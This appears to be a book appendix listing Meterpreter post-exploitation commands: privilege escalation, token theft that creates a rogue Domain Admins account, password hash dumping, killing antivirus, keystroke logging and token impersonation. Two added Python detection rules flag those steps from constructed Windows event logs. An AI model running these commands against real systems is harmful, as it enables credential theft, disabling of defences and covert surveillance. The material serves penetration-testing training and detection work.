
Appendix B

Meterpreter Post Exploitation Commands

Elevate your permissions on Windows-based systems using Meterpreter:

meterpreter > use priv
meterpreter > getsystem

Steal a domain administrator token from a given process ID, add a domain account, and then add it to the Domain Admins group:

meterpreter > ps
meterpreter > steal_token 1784
meterpreter > shell
C:\Windows\system32> net user metasploit p@55w0rd /ADD /DOMAIN
C:\Windows\system32> net group "Domain Admins" metasploit /ADD /DOMAIN
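The sequence above leaves a recognisable trail on the domain controller: a user-account-created event (Security event ID 4720) followed seconds later by a member-added-to-global-group event (4728) naming Domain Admins. The following detection rule is an added example written for this appendix, not code from the book or from Metasploit; it correlates those two events over a simplified, constructed log format (real Security logs are EVTX/XML, and the account names, domain and timestamps are made up for the example).

```python
from datetime import datetime
from typing import Dict, List

# Constructed sample Security-log records in a simplified pipe-delimited form:
#   timestamp|event_id|subject_account|target_account|group_name
# Event 4720 = user account created, 4728 = member added to a
# security-enabled global group. Accounts and times are invented.
SAMPLE_EVENTS = [
    "2024-01-15T10:02:11|4624|CORP\\backupsvc||",
    "2024-01-15T10:05:40|4720|CORP\\jsmith|metasploit|",
    "2024-01-15T10:05:52|4728|CORP\\jsmith|metasploit|Domain Admins",
    "2024-01-15T11:30:00|4720|CORP\\hr-admin|newhire|",
    "2024-01-15T11:31:10|4728|CORP\\hr-admin|newhire|Helpdesk",
]

# Groups whose membership changes always deserve a look (assumed list).
PRIVILEGED_GROUPS = {"domain admins", "enterprise admins", "schema admins"}


def parse_events(lines: List[str]) -> List[Dict[str, object]]:
    """Split each constructed log line into a dict, sorted by timestamp."""
    events = []
    for line in lines:
        ts, event_id, subject, target, group = line.split("|")
        events.append({
            "time": datetime.fromisoformat(ts),
            "event_id": int(event_id),
            "subject": subject,
            "target": target,
            "group": group,
        })
    return sorted(events, key=lambda e: e["time"])


def detect_privileged_group_additions(events, window_seconds=600):
    """Flag every addition to a privileged group (event 4728).

    Severity is 'high' when the same account was created (event 4720) no
    more than window_seconds earlier, i.e. the create-then-elevate sequence
    shown above; any other privileged-group addition is marked 'review'.
    """
    created_at = {}  # target account (lower-cased) -> time of its 4720 event
    alerts = []
    for ev in events:
        if ev["event_id"] == 4720:
            created_at[ev["target"].lower()] = ev["time"]
        elif ev["event_id"] == 4728 and ev["group"].lower() in PRIVILEGED_GROUPS:
            created = created_at.get(ev["target"].lower())
            gap = (ev["time"] - created).total_seconds() if created else None
            recent = gap is not None and gap <= window_seconds
            alerts.append({
                "account": ev["target"],
                "group": ev["group"],
                "by": ev["subject"],
                "severity": "high" if recent else "review",
                "created_seconds_before": gap if recent else None,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_privileged_group_additions(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

Any 4728 into a privileged group is reported even without a preceding 4720, because a token-stealing attacker can just as easily add an existing account; the creation-to-elevation gap only raises the severity. The subject field matters too: here the change is attributed to jsmith, whose token was impersonated, which is why event correlation alone cannot tell you who was actually at the keyboard.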

Dump password hashes from the SAM database:

meterpreter > use priv
meterpreter > getsystem
meterpreter > hashdump

NOTE: On Win2k8 you may need to migrate to a process that is running as SYSTEM if getsystem and hashdump throw exceptions.

Automigrate to a separate process:

meterpreter > run migrate

Kill antivirus processes running on the target via the killav Meterpreter script:

meterpreter > run killav
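A script like killav terminates several security products within a second or two of each other, and that burst is easier to detect than any single termination. The rule below is an added example, not code from the book or from the Metasploit project; it reads constructed process-termination records (Security event 4689, reduced to the fields the rule needs) and raises an alert when two or more distinct security-product processes exit within a short window. The process-name list and all sample records are assumptions made for the example.

```python
from datetime import datetime
from typing import Dict, List

# Image names of security products; illustrative, not exhaustive (assumption).
SECURITY_PROCESSES = {"msmpeng.exe", "nissrv.exe", "avp.exe", "ccsvchst.exe"}

# Constructed process-termination records (Security event 4689) in a
# simplified pipe-delimited form: timestamp|subject_account|process_path|exit_status
SAMPLE_TERMINATIONS = [
    "2024-01-15T10:07:01|CORP\\jsmith|C:\\Windows\\notepad.exe|0x0",
    "2024-01-15T10:07:30|NT AUTHORITY\\SYSTEM|C:\\Program Files\\Windows Defender\\MsMpEng.exe|0x1",
    "2024-01-15T10:07:31|NT AUTHORITY\\SYSTEM|C:\\Program Files\\Windows Defender\\NisSrv.exe|0x1",
    "2024-01-15T18:00:00|NT AUTHORITY\\SYSTEM|C:\\Program Files\\Windows Defender\\MsMpEng.exe|0x0",
]


def security_process_exits(lines: List[str]):
    """Keep only terminations of watched processes, as sorted tuples."""
    hits = []
    for line in lines:
        ts, subject, path, status = line.split("|")
        name = path.rsplit("\\", 1)[-1].lower()  # image name from full path
        if name in SECURITY_PROCESSES:
            hits.append((datetime.fromisoformat(ts), subject, name, status))
    return sorted(hits)


def detect_security_process_kills(lines: List[str], window_seconds=60,
                                  min_count=2) -> List[Dict[str, object]]:
    """Alert when >= min_count distinct security processes exit within
    window_seconds of each other (a mass-kill burst). Isolated exits, such
    as a product restarting after an update, are left alone."""
    hits = security_process_exits(lines)
    alerts = []
    i = 0
    while i < len(hits):
        j = i
        while j < len(hits) and (hits[j][0] - hits[i][0]).total_seconds() <= window_seconds:
            j += 1
        burst = hits[i:j]
        names = sorted({h[2] for h in burst})
        if len(names) >= min_count:
            alerts.append({
                "start": burst[0][0].isoformat(),
                "span_seconds": (burst[-1][0] - burst[0][0]).total_seconds(),
                "by": sorted({h[1] for h in burst}),
                "processes": names,
            })
            i = j  # do not re-report the same burst
        else:
            i += 1
    return alerts


if __name__ == "__main__":
    for alert in detect_security_process_kills(SAMPLE_TERMINATIONS):
        print(alert)
```

The window and count are tunable: on hosts where one product legitimately restarts several services at once, raise min_count or pair this rule with the exit status and the parent process so that a service-controller restart is not confused with a termination from an injected process.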

Capture keystrokes on target machines from within a particular process:

meterpreter > ps
meterpreter > migrate 1436
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop

Use Incognito to impersonate an administrator:

meterpreter > use incognito
meterpreter > list_tokens -u
meterpreter > use priv
meterpreter > getsystem